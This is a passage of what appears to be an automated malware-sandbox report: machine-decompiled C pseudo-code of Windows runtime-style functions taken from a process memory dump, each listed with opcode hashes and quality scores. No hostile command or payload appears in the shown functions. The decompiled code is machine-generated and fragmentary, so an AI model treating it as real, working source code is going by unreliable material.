                                          				signed int _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				char* _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				char _v72;
                                          				signed short* _v76;
                                          				signed int _v80;
                                          				char _v84;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t68;
                                          				intOrPtr _t73;
                                          				signed short* _t74;
                                          				void* _t77;
                                          				void* _t78;
                                          				signed int _t79;
                                          				signed int _t80;
                                          
                                          				_v8 =  *0x100d360 ^ _t80;
                                          				_t75 = 0x100;
                                          				_v64 = _v64 & 0x00000000;
                                          				_v76 = __ecx;
                                          				_t79 = 0;
                                          				_t68 = 0;
                                          				_v72 = 1;
                                          				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                          				_t77 = 0;
                                          				if(L00F26C59(__ecx[2], 0x100, __eflags) != 0) {
                                          					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          					if(_t79 != 0 && E00F96BA3() != 0) {
                                          						_push(0);
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x1f0003);
                                          						_push( &_v64);
                                          						if(E00F59980() >= 0) {
                                          							E00F32280(_t56, 0x1008778);
                                          							_t77 = 1;
                                          							_t68 = 1;
                                          							if( *0x1008774 == 0) {
                                          								asm("cdq");
                                          								 *(_t79 + 0xf70) = _v64;
                                          								 *(_t79 + 0xf74) = 0x100;
                                          								_t75 = 0;
                                          								_t73 = 4;
                                          								_v60 =  &_v68;
                                          								_v52 = _t73;
                                          								_v36 = _t73;
                                          								_t74 = _v76;
                                          								_v44 =  &_v72;
                                          								 *0x1008774 = 1;
                                          								_v56 = 0;
                                          								_v28 = _t74[2];
                                          								_v48 = 0;
                                          								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                          								_v40 = 0;
                                          								_v32 = 0;
                                          								_v24 = 0;
                                          								_v16 = 0;
                                          								if(E00F1B6F0(0xefc338, 0xefc288, 3,  &_v60) == 0) {
                                          									_v80 = _v80 | 0xffffffff;
                                          									_push( &_v84);
                                          									_push(0);
                                          									_push(_v64);
                                          									_v84 = 0xfa0a1f00;
                                          									E00F59520();
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				if(_v64 != 0) {
                                          					_push(_v64);
                                          					E00F595D0();
                                          					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                          					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                          				}
                                          				if(_t77 != 0) {
                                          					E00F2FFB0(_t68, _t77, 0x1008778);
                                          				}
                                          				_pop(_t78);
                                          				return E00F5B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
                                          • Instruction ID: e89f246d6051937002fae598fd246827c85f380c49f9a611ddcb2cd10e73d691
                                          • Opcode Fuzzy Hash: 58c2fde7a7a0170b3dd6d817ba217b0ec91eb3f62e39f71d8604bd7615bbd24a
                                          • Instruction Fuzzy Hash: FD4188B1D00208AFEB25DFA5D941BAEBBF4FF48714F14812AE914A7241DB789905DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E00F15210(intOrPtr _a4, void* _a8) {
                                          				void* __ecx;
                                          				intOrPtr _t31;
                                          				signed int _t32;
                                          				signed int _t33;
                                          				intOrPtr _t35;
                                          				signed int _t52;
                                          				void* _t54;
                                          				void* _t56;
                                          				unsigned int _t59;
                                          				signed int _t60;
                                          				void* _t61;
                                          
                                          				_t61 = E00F152A5(1);
                                          				if(_t61 == 0) {
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                          					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                          				} else {
                                          					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                          					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                          				}
                                          				_t60 = _t59 >> 1;
                                          				_t32 = 0x3a;
                                          				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 > _t52) {
                                          						goto L5;
                                          					}
                                          					if(_t61 != 0) {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t32 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E00F595D0();
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					} else {
                                          						E00F2EB70(_t54, 0x10079a0);
                                          					}
                                          					_t26 = _t52 + 2; // 0xddeeddf0
                                          					return _t26;
                                          				} else {
                                          					_t52 = _t60 + _t60;
                                          					if(_a4 < _t52) {
                                          						if(_t61 != 0) {
                                          							asm("lock xadd [esi], eax");
                                          							if((_t32 | 0xffffffff) == 0) {
                                          								_push( *((intOrPtr*)(_t61 + 4)));
                                          								E00F595D0();
                                          								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          							}
                                          						} else {
                                          							E00F2EB70(_t54, 0x10079a0);
                                          						}
                                          						return _t52;
                                          					}
                                          					L5:
                                          					_t33 = E00F5F3E0(_a8, _t54, _t52);
                                          					if(_t61 == 0) {
                                          						E00F2EB70(_t54, 0x10079a0);
                                          					} else {
                                          						asm("lock xadd [esi], eax");
                                          						if((_t33 | 0xffffffff) == 0) {
                                          							_push( *((intOrPtr*)(_t61 + 4)));
                                          							E00F595D0();
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                          						}
                                          					}
                                          					_t35 = _a8;
                                          					if(_t60 <= 1) {
                                          						L9:
                                          						_t60 = _t60 - 1;
                                          						 *((short*)(_t52 + _t35 - 2)) = 0;
                                          						goto L10;
                                          					} else {
                                          						_t56 = 0x3a;
                                          						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                          							 *((short*)(_t52 + _t35)) = 0;
                                          							L10:
                                          							return _t60 + _t60;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4d38e5c760110dc3d6594c83eed6370e780a1659f613014872f9dc9d73163c70
                                          • Instruction ID: 546513bb4facdfb86460ecc19e9b685200177f9d11682b1725a5704eec920bee
                                          • Opcode Fuzzy Hash: 4d38e5c760110dc3d6594c83eed6370e780a1659f613014872f9dc9d73163c70
                                          • Instruction Fuzzy Hash: ED31F332641B50EBC736AB58CC41B6677A5EF50B30F20861AF8590B1A1EF74ED40E692
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00F4A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t35;
                                          				intOrPtr _t39;
                                          				intOrPtr _t45;
                                          				intOrPtr* _t51;
                                          				intOrPtr* _t52;
                                          				intOrPtr* _t55;
                                          				signed int _t57;
                                          				intOrPtr* _t59;
                                          				intOrPtr _t68;
                                          				intOrPtr* _t77;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t81;
                                          				char* _t82;
                                          				void* _t83;
                                          
                                          				_push(0x24);
                                          				_push(0xff0220);
                                          				E00F6D08C(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                          				_t79 = __ecx;
                                          				_t35 =  *0x1007b9c; // 0x0
                                          				_t55 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                          				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                          				if(_t55 == 0) {
                                          					_t39 = 0xc0000017;
                                          					L11:
                                          					return E00F6D0D1(_t39);
                                          				}
                                          				_t68 = 0;
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                          				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                          				_t7 = _t55 + 8; // 0x8
                                          				_t57 = 6;
                                          				memcpy(_t7, _t79, _t57 << 2);
                                          				_t80 = 0xfffffffe;
                                          				 *(_t83 - 4) = _t80;
                                          				if(0 < 0) {
                                          					L14:
                                          					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          					L20:
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                          					_t39 = _t81;
                                          					goto L11;
                                          				}
                                          				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                          					_t81 = 0xc000007b;
                                          					goto L20;
                                          				}
                                          				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                          					_t59 =  *((intOrPtr*)(_t83 + 8));
                                          					_t45 =  *_t59;
                                          					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                          					 *_t59 = _t45 + 1;
                                          					L6:
                                          					 *(_t83 - 4) = 1;
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *(_t83 - 4) = _t80;
                                          					if(_t68 < 0) {
                                          						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                          						if(_t82 == 0) {
                                          							goto L14;
                                          						}
                                          						asm("btr eax, ecx");
                                          						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                          						if( *_t82 != 0) {
                                          							 *0x1007b10 =  *0x1007b10 - 8;
                                          						}
                                          						goto L20;
                                          					}
                                          					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                          					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                          					_t51 =  *0x100536c; // 0x77ad5368
                                          					if( *_t51 != 0x1005368) {
                                          						_push(3);
                                          						asm("int 0x29");
                                          						goto L14;
                                          					}
                                          					 *_t55 = 0x1005368;
                                          					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                          					 *_t51 = _t55;
                                          					 *0x100536c = _t55;
                                          					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                          					if(_t52 != 0) {
                                          						 *_t52 = _t55;
                                          					}
                                          					_t39 = 0;
                                          					goto L11;
                                          				}
                                          				_t77 =  *((intOrPtr*)(_t83 + 8));
                                          				_t68 = E00F4A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                          				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                          				if(_t68 < 0) {
                                          					goto L14;
                                          				}
                                          				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                          				goto L6;
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15d451b79d87ed70ae8db3b377b724cf3903e226201c700cf12455099b871c5e
                                          • Instruction ID: 4102a3edc35e5e3cb83b32df0c5b966eb3fc0230dabce2cf0ac9aa2e5ac54558
                                          • Opcode Fuzzy Hash: 15d451b79d87ed70ae8db3b377b724cf3903e226201c700cf12455099b871c5e
                                          • Instruction Fuzzy Hash: EF4168B5A44209DFCB15DF58D890BA9BBF1BB89310F1980A9E904AB385C779AD01EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00F97016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                          				signed int _v8;
                                          				char _v588;
                                          				intOrPtr _v592;
                                          				intOrPtr _v596;
                                          				signed short* _v600;
                                          				char _v604;
                                          				short _v606;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short* _t55;
                                          				void* _t56;
                                          				signed short* _t58;
                                          				signed char* _t61;
                                          				char* _t68;
                                          				void* _t69;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t75;
                                          
                                          				_t64 = __edx;
                                          				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                          				_v8 =  *0x100d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                          				_t55 = _a16;
                                          				_v606 = __ecx;
                                          				_t71 = 0;
                                          				_t58 = _a12;
                                          				_v596 = __edx;
                                          				_v600 = _t58;
                                          				_t68 =  &_v588;
                                          				if(_t58 != 0) {
                                          					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                          					if(_t55 != 0) {
                                          						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                          					}
                                          				}
                                          				_t8 = _t71 + 0x2a; // 0x28
                                          				_t33 = _t8;
                                          				_v592 = _t8;
                                          				if(_t71 <= 0x214) {
                                          					L6:
                                          					 *((short*)(_t68 + 6)) = _v606;
                                          					if(_t64 != 0xffffffff) {
                                          						asm("cdq");
                                          						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                          						 *((char*)(_t68 + 0x28)) = _a4;
                                          						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                          						 *((char*)(_t68 + 0x29)) = _a8;
                                          						if(_t71 != 0) {
                                          							_t22 = _t68 + 0x2a; // 0x2a
                                          							_t64 = _t22;
                                          							E00F96B4C(_t58, _t22, _t71,  &_v604);
                                          							if(_t55 != 0) {
                                          								_t25 = _v604 + 0x2a; // 0x2a
                                          								_t64 = _t25 + _t68;
                                          								E00F96B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                          							}
                                          							if(E00F37D50() == 0) {
                                          								_t61 = 0x7ffe0384;
                                          							} else {
                                          								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							}
                                          							_push(_t68);
                                          							_push(_v592 + 0xffffffe0);
                                          							_push(0x402);
                                          							_push( *_t61 & 0x000000ff);
                                          							E00F59AE0();
                                          						}
                                          					}
                                          					_t35 =  &_v588;
                                          					if( &_v588 != _t68) {
                                          						_t35 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                          					}
                                          					L16:
                                          					_pop(_t69);
                                          					_pop(_t72);
                                          					_pop(_t56);
                                          					return E00F5B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                          				}
                                          				_t68 = L00F34620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                          				if(_t68 == 0) {
                                          					goto L16;
                                          				} else {
                                          					_t58 = _v600;
                                          					_t64 = _v596;
                                          					goto L6;
                                          				}
                                          			}























                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
                                          • Instruction ID: 32ec2d8882ab7a87af8b5101395741a8f8e0409f7d23449d79b54841ac838102
                                          • Opcode Fuzzy Hash: e5f2ea81c116884c1afc669852e1b92397cb0cc0bd784241e2b2e38127fb83d8
                                          • Instruction Fuzzy Hash: 6A31E472A087419BD724EF28CC41A6BB3E5BFC8710F044A29F89587691E734ED04DBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E00F3C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                          				signed int* _v8;
                                          				char _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t33;
                                          				signed char _t43;
                                          				signed char _t48;
                                          				signed char _t62;
                                          				void* _t63;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				unsigned int* _t82;
                                          				void* _t83;
                                          
                                          				_t80 = __ecx;
                                          				_t82 = __edx;
                                          				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                          				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                          				if((_t33 & 0x00000001) != 0) {
                                          					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                          					if(E00F37D50() != 0) {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					} else {
                                          						_t43 = 0x7ffe0386;
                                          					}
                                          					if( *_t43 != 0) {
                                          						_t43 = E00FE8D34(_v8, _t80);
                                          					}
                                          					E00F32280(_t43, _t82);
                                          					if( *((char*)(_t80 + 0xdc)) == 0) {
                                          						E00F2FFB0(_t62, _t80, _t82);
                                          						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                          						_t30 = _t80 + 0xd0; // 0xd0
                                          						_t83 = _t30;
                                          						E00FE8833(_t83,  &_v16);
                                          						_t81 = _t80 + 0x90;
                                          						E00F2FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                          						_t63 = 0;
                                          						_push(0);
                                          						_push(_t83);
                                          						_t48 = E00F5B180();
                                          						if(_a4 != 0) {
                                          							E00F32280(_t48, _t81);
                                          						}
                                          					} else {
                                          						_t69 = _v8;
                                          						_t12 = _t80 + 0x98; // 0x98
                                          						_t13 = _t69 + 0xc; // 0x575651ff
                                          						E00F3BB2D(_t13, _t12);
                                          						_t71 = _v8;
                                          						_t15 = _t80 + 0xb0; // 0xb0
                                          						_t16 = _t71 + 8; // 0x8b000cc2
                                          						E00F3BB2D(_t16, _t15);
                                          						E00F3B944(_v8, _t62);
                                          						 *((char*)(_t80 + 0xdc)) = 0;
                                          						E00F2FFB0(0, _t80, _t82);
                                          						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                          						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                          						 *(_t80 + 0xde) = 0;
                                          						if(_a4 == 0) {
                                          							_t25 = _t80 + 0x90; // 0x90
                                          							E00F2FFB0(0, _t80, _t25);
                                          						}
                                          						_t63 = 1;
                                          					}
                                          					return _t63;
                                          				}
                                          				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                          				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                          				if(_a4 == 0) {
                                          					_t24 = _t80 + 0x90; // 0x90
                                          					E00F2FFB0(0, __ecx, _t24);
                                          				}
                                          				return 0;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 660fdadb7ac4459ac50b35ae4ea492d521ba870fa3fae698eff1de6ca4d629f0
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: F5313972A01546BED704FBB4CC91BEAF764BF46320F14416AE41C57202DB38AA09F7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00F4A70E(intOrPtr* __ecx, char* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr* _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t16;
                                          				intOrPtr _t17;
                                          				intOrPtr _t28;
                                          				char* _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t38;
                                          				void* _t50;
                                          				intOrPtr _t52;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t52 =  *0x1007b10; // 0x0
                                          				_t33 = __edx;
                                          				_t48 = __ecx;
                                          				_v12 = __ecx;
                                          				if(_t52 == 0) {
                                          					 *0x1007b10 = 8;
                                          					 *0x1007b14 = 0x1007b0c;
                                          					 *0x1007b18 = 1;
                                          					L6:
                                          					_t2 = _t52 + 1; // 0x1
                                          					E00F4A990(0x1007b10, _t2, 7);
                                          					asm("bts ecx, eax");
                                          					 *_t48 = _t52;
                                          					 *_t33 = 1;
                                          					L3:
                                          					_t16 = 0;
                                          					L4:
                                          					return _t16;
                                          				}
                                          				_t17 = L00F4A840(__edx, __ecx, __ecx, _t52, 0x1007b10, 1, 0);
                                          				if(_t17 == 0xffffffff) {
                                          					_t37 =  *0x1007b10; // 0x0
                                          					_t3 = _t37 + 0x27; // 0x27
                                          					__eflags = _t3 >> 5 -  *0x1007b18; // 0x0
                                          					if(__eflags > 0) {
                                          						_t38 =  *0x1007b9c; // 0x0
                                          						_t4 = _t52 + 0x27; // 0x27
                                          						_v8 = _t4 >> 5;
                                          						_t50 = L00F34620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                          						__eflags = _t50;
                                          						if(_t50 == 0) {
                                          							_t16 = 0xc0000017;
                                          							goto L4;
                                          						}
                                          						 *0x1007b18 = _v8;
                                          						_t8 = _t52 + 7; // 0x7
                                          						E00F5F3E0(_t50,  *0x1007b14, _t8 >> 3);
                                          						_t28 =  *0x1007b14; // 0x0
                                          						__eflags = _t28 - 0x1007b0c;
                                          						if(_t28 != 0x1007b0c) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                          						}
                                          						_t9 = _t52 + 8; // 0x8
                                          						 *0x1007b14 = _t50;
                                          						_t48 = _v12;
                                          						 *0x1007b10 = _t9;
                                          						goto L6;
                                          					}
                                          					 *0x1007b10 = _t37 + 8;
                                          					goto L6;
                                          				}
                                          				 *__ecx = _t17;
                                          				 *_t33 = 0;
                                          				goto L3;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: df97568c9c742502eb57025c3260e436904ed9e32c1e7e966027dc362e7e39a3
                                          • Instruction ID: e4ef9f1c0f8be79313727536edeab2160ab0568d0d88fa584d1005a28b191d99
                                          • Opcode Fuzzy Hash: df97568c9c742502eb57025c3260e436904ed9e32c1e7e966027dc362e7e39a3
                                          • Instruction Fuzzy Hash: 4A31D0B1600A049FD722DF08DCA1F657BF9FB84720F94095AE6C587244D37EB941DBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E00F461A0(signed int* __ecx) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t49;
                                          				signed int _t51;
                                          				intOrPtr _t52;
                                          				signed int _t54;
                                          				void* _t59;
                                          				signed int* _t61;
                                          				intOrPtr* _t64;
                                          
                                          				_t61 = __ecx;
                                          				_v12 = 0;
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          				_v16 = __ecx;
                                          				_v8 = 0;
                                          				if(_t30 == 0) {
                                          					L6:
                                          					_t31 = 0;
                                          					L7:
                                          					return _t31;
                                          				}
                                          				_t32 = _t30 + 0x5d8;
                                          				if(_t32 == 0) {
                                          					goto L6;
                                          				}
                                          				_t59 = _t32 + 0x30;
                                          				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                          					goto L6;
                                          				}
                                          				if(__ecx != 0) {
                                          					 *((intOrPtr*)(__ecx)) = 0;
                                          					 *((intOrPtr*)(__ecx + 4)) = 0;
                                          				}
                                          				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                          					_t51 =  *(_t32 + 0x10);
                                          					_t33 = _t32 + 0x10;
                                          					_v20 = _t33;
                                          					_t54 =  *(_t33 + 4);
                                          					if((_t51 | _t54) == 0) {
                                          						_t37 = E00F45E50(0xef67cc, 0, 0,  &_v12);
                                          						if(_t37 != 0) {
                                          							goto L6;
                                          						}
                                          						_t52 = _v8;
                                          						asm("lock cmpxchg8b [esi]");
                                          						_t64 = _v16;
                                          						_t49 = _t37;
                                          						_v20 = 0;
                                          						if(_t37 == 0) {
                                          							if(_t64 != 0) {
                                          								 *_t64 = _v12;
                                          								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                          							}
                                          							E00FE9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                          							_t31 = 1;
                                          							goto L7;
                                          						}
                                          						E00F1F7C0(_t52, _v12, _t52, 0);
                                          						if(_t64 != 0) {
                                          							 *_t64 = _t49;
                                          							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                          						}
                                          						L12:
                                          						_t31 = 1;
                                          						goto L7;
                                          					}
                                          					if(_t61 != 0) {
                                          						 *_t61 = _t51;
                                          						_t61[1] = _t54;
                                          					}
                                          					goto L12;
                                          				} else {
                                          					goto L6;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
                                          • Instruction ID: 75b1ecd8475590f77975967848166565aaf6e745cd36c60b57d7820bf5033ae2
                                          • Opcode Fuzzy Hash: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
                                          • Instruction Fuzzy Hash: 79317C72A097018FD324EF19C800B66BBE4FB88B10F15496DE998D7391E7B0DD04EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E00F1AA16(signed short* __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				signed short _v16;
                                          				intOrPtr _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				void* _v32;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t25;
                                          				signed short _t38;
                                          				signed short* _t42;
                                          				signed int _t44;
                                          				signed short* _t52;
                                          				signed short _t53;
                                          				signed int _t54;
                                          
                                          				_v8 =  *0x100d360 ^ _t54;
                                          				_t42 = __ecx;
                                          				_t44 =  *__ecx & 0x0000ffff;
                                          				_t52 =  &(__ecx[2]);
                                          				_t51 = _t44 + 2;
                                          				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                          					L4:
                                          					_t25 =  *0x1007b9c; // 0x0
                                          					_t53 = L00F34620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                          					__eflags = _t53;
                                          					if(_t53 == 0) {
                                          						L3:
                                          						return E00F5B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                          					} else {
                                          						E00F5F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                          						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						L2:
                                          						_t51 = 4;
                                          						if(L00F26C59(_t53, _t51, _t58) != 0) {
                                          							_t28 = E00F45E50(0xefc338, 0, 0,  &_v32);
                                          							__eflags = _t28;
                                          							if(_t28 == 0) {
                                          								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                          								__eflags = _t38;
                                          								_v24 = _t53;
                                          								_v16 = _t38;
                                          								_v20 = 0;
                                          								_v12 = 0;
                                          								E00F4B230(_v32, _v28, 0xefc2d8, 1,  &_v24);
                                          								_t28 = E00F1F7A0(_v32, _v28);
                                          							}
                                          							__eflags = _t53 -  *_t52;
                                          							if(_t53 !=  *_t52) {
                                          								_t28 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						goto L3;
                                          					}
                                          				}
                                          				_t53 =  *_t52;
                                          				_t44 = _t44 >> 1;
                                          				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                          				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
                                          • Instruction ID: 4c79e862a470abbf72e13a3aab58d01d23b0bfd549e6a71687eeea4bcf97b409
                                          • Opcode Fuzzy Hash: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
                                          • Instruction Fuzzy Hash: 3231E571A00619EBCB11EF64CD42ABFB7B9EF04710F10406AF905E7141E779AD51EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00F58EC7(void* __ecx, void* __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
